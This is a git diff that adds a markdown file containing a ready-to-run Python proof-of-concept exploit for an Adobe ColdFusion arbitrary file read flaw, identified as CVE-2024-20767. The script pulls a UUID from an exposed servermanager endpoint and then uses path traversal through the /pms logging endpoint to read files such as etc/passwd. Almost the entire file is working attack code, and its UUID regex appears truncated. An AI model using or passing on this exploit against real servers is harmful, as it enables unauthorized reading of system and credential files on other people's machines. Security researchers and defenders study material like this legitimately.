diff --git a/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md b/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md new file mode 100644 index 0000000..db98c1f --- /dev/null +++ b/Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767.md @@ -0,0 +1,50 @@ +## Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767 + + +## poc +```python +import requests +import re +import urllib3 +import argparse + +urllib3.disable_warnings() + +parser = argparse.ArgumentParser() +parser.add_argument("-t", "--target",required=True, help="Target Adobe ColdFusion Server URL") +parser.add_argument("-p", "--port",required=False, default=8500, help="Target Adobe ColdFusion Server Port, by default we use the 8500 Port") +parser.add_argument("-c", "--command", required=True,help="File to read path") # Example in Windows Server 'Windows/ServerStandardEval.xml' or Linux Server "etc/passwd" +args = parser.parse_args() + +def get_uuid(): + endpoint = "/CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat" # Vulnerable endpoint to get the UUID + session = requests.Session() + try: + response = session.get(args.target+":"+str(args.port)+endpoint, verify=False) + print("[+] Connecting to ColdFusion Server...") + repattern = r"(.+?)" # Regex expression to get UUID + uuid = re.findall(repattern, response.text)[0] + print("[+] UUID Obtained: ", uuid) + return uuid + except: + print("[-] Error connecting to server") + +def exploit(uuid): + headers = { + "uuid": uuid + } + session = requests.Session() + endpoint2 = "/pms?module=logging&file_name=../../../../../../../"+args.command+"&number_of_lines=100" # Vulnerable endpoint to read files + response = session.get(args.target+":"+str(args.port)+endpoint2, verify=False, headers=headers) + if response.status_code == 200 and int(response.headers["Content-Length"]) > 2: + print("[+] Succesfully read file!") + print(response.text) + else: + print("[-] Something went wrong while reading file or the file doesn't exist") + +if __name__ == "__main__": + exploit(get_uuid()) +``` + +## 漏洞分析 +- https://jeva.cc/2973.html